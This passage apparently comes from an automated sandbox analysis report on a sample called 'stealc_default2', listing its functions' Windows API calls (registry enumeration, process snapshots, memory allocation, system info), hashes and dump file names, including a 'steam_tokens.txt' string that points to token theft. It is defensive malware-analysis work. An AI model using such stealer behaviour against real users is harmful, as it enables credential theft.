Part of subcall function 006A8100: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00A10260,00000000,?,006B0E2C,00000000,?,00000000,00000000), ref: 006A8137
Part of subcall function 006A8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006A8158
Part of subcall function 006A8100: __aulldiv.LIBCMT ref: 006A8172
Part of subcall function 006A8100: __aulldiv.LIBCMT ref: 006A8180
Part of subcall function 006A8100: wsprintfA.USER32 ref: 006A81AC

Part of subcall function 006A87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E28,00000000,?), ref: 006A882F
Part of subcall function 006A87C0: HeapAlloc.KERNEL32(00000000,?,?,?,?,006B0E28,00000000,?), ref: 006A8836
Part of subcall function 006A87C0: wsprintfA.USER32 ref: 006A8850

Part of subcall function 006A8320: RegOpenKeyExA.KERNEL32(00000000,00A0E270,00000000,00020019,00000000,006B05B6), ref: 006A83A4

Part of subcall function 006A8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
Part of subcall function 006A8320: wsprintfA.USER32 ref: 006A8459
Part of subcall function 006A8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 006A847B
Part of subcall function 006A8320: RegCloseKey.ADVAPI32(00000000), ref: 006A848C
Part of subcall function 006A8320: RegCloseKey.ADVAPI32(00000000), ref: 006A8499

Part of subcall function 006A8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006B05B7), ref: 006A86CA
Part of subcall function 006A8680: Process32First.KERNEL32(?,00000128), ref: 006A86DE
Part of subcall function 006A8680: Process32Next.KERNEL32(?,00000128), ref: 006A86F3
Part of subcall function 006A8680: CloseHandle.KERNEL32(?), ref: 006A8761

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 006A265B

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 2204142833-0
Opcode ID: 1669b2c4777cfb130058d6f998a07f1365002a9648b1e8a9ec051dc5bc9145df
Instruction ID: 15feaf1985a214cf2a227aa5af76955e9fa7ce0eada8ec1ef79794abbac72005
Opcode Fuzzy Hash: 1669b2c4777cfb130058d6f998a07f1365002a9648b1e8a9ec051dc5bc9145df
Instruction Fuzzy Hash: 74723C71811118AADB99FBD0DC92DEE733AAF15300F51829EB11762092EF346F49CF69

Function 006A5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA820: lstrlenA.KERNEL32(00000000,?,?,006A5B54,006B0ADB,006B0ADA,?,?,006A6B16,00000000,?,00A01348,?,006B110C,?,00000000), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(k,00000000), ref: 006AA885

lstrlenA.KERNEL32(00000000,00000000,006B0ACA,?,?,?,?,?,?,006A610B,?), ref: 006A512A

Strings

steam_tokens.txt, xrefs: 006A513F

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 320088ff8c0e2f6280f1afb708c45877518919912187193bbdce11fda28f0fe3
Instruction ID: d46b0eff66fe3f5dd7a42a8db325fab758d25d85dd4c4c5579af532ede804e5d
Opcode Fuzzy Hash: 320088ff8c0e2f6280f1afb708c45877518919912187193bbdce11fda28f0fe3
Instruction Fuzzy Hash: 74F04B7190010866CB84FBF0DC529ED733EAB16300F50425EB81366492EF246E09CBAA

Function 006A7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(006B0E2C), ref: 006A7F00
wsprintfA.USER32 ref: 006A7F16

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: b3c86fab9120eacfcaa0110a85ff60fff98263e61e9e6d8be7c2631aa1f5e5ba
Instruction ID: f9cb37cc697deadc9939d0d5be67b97ab604dc8dc0fc261968c7cee8b2d3bd3e
Opcode Fuzzy Hash: b3c86fab9120eacfcaa0110a85ff60fff98263e61e9e6d8be7c2631aa1f5e5ba
Instruction Fuzzy Hash: C6F090F1A04208EBCB14DF84EC45FEAFBBCFB49B24F10066AF51592680D7756A448BE1

Function 0069B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 00699E10: memcmp.MSVCRT(?,v20,00000003), ref: 00699E2D

lstrlenA.KERNEL32(00000000), ref: 0069B9C2
lstrlenA.KERNEL32(00000000), ref: 0069B9D6

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$memcmp
String ID:
API String ID: 3457870978-0
Opcode ID: a76a9fc8c01edfa4c3aad2cde3a438e23648604de65e04afd3dba0e65ded2d25
Instruction ID: e0106d19760e057a8466e2dc0e705bf87783faf3a2140909137a1c2d11c2486d
Opcode Fuzzy Hash: a76a9fc8c01edfa4c3aad2cde3a438e23648604de65e04afd3dba0e65ded2d25
Instruction Fuzzy Hash: EFE1D9729211189ADB88FBE0DC92EEE733ABF15300F50415EB50766091EF346E49CFA6

Function 0069AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

lstrlenA.KERNEL32(00000000), ref: 0069B16A
lstrlenA.KERNEL32(00000000), ref: 0069B17E

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: a08754008e8f6c94e2736af60458e7af9bd19cbb9bbd4f9af4c9b73d1ba454ce
Instruction ID: 4c2a664d2b430625d6bb711d7e9de6653b759758c5e0d9f90dfab00d94360032
Opcode Fuzzy Hash: a08754008e8f6c94e2736af60458e7af9bd19cbb9bbd4f9af4c9b73d1ba454ce
Instruction Fuzzy Hash: 8191FD729111089BDB88FBE0DC96DEE737AAF15300F50425EB507A6091EF346E49CFA6

Function 0069B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

lstrlenA.KERNEL32(00000000), ref: 0069B42E
lstrlenA.KERNEL32(00000000), ref: 0069B442

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 29f634e92c2c4b91b0b6509cc05edc1b02f027fa70d676f8a8b411910708427a
Instruction ID: e767b3f98c175963a9df1d66b964e6dc9257155bd1a8efc70378b37c3c02ef4d
Opcode Fuzzy Hash: 29f634e92c2c4b91b0b6509cc05edc1b02f027fa70d676f8a8b411910708427a
Instruction Fuzzy Hash: EA710D719111089ADB88FBE0DD56DEE737ABF55300F50411EB503A6191EF34AE09CFA6

Function 00696660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00696DBE,00696DBE,00003000,00000040), ref: 00696706
VirtualAlloc.KERNEL32(00000000,00696DBE,00003000,00000040), ref: 00696753

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f386907c94223d6771cf46c71ec9a40efc8bdb977fa0ec2c4a4a9eb0c3a2fd18
Instruction ID: e1ea06ed942d0a0df275e627c089004882d1758909a1fe47f62205618383f430
Opcode Fuzzy Hash: f386907c94223d6771cf46c71ec9a40efc8bdb977fa0ec2c4a4a9eb0c3a2fd18
Instruction Fuzzy Hash: CF41CB74A00209EFCB44CF98C494BADBBB6FF44314F2482A9E9599B755D731EA81CF84

Function 006910A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0069114E,?,?,006A6A1C), ref: 006910B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0069114E,?,?,006A6A1C), ref: 006910F7

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c96eeb9b53b05a3ea330fb6a75bb3e0afbba80f7cc68fa6e072178efff4e70b6
Instruction ID: 2f885508560eb3147bf85ba41b9233855b7396c67be83b70d7ed345f3221c916
Opcode Fuzzy Hash: c96eeb9b53b05a3ea330fb6a75bb3e0afbba80f7cc68fa6e072178efff4e70b6
Instruction Fuzzy Hash: C5F0E971641204BBEB149AA49C49FEFB7DCE705715F300548F504E7380D5725E00DA64

Function 006A8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

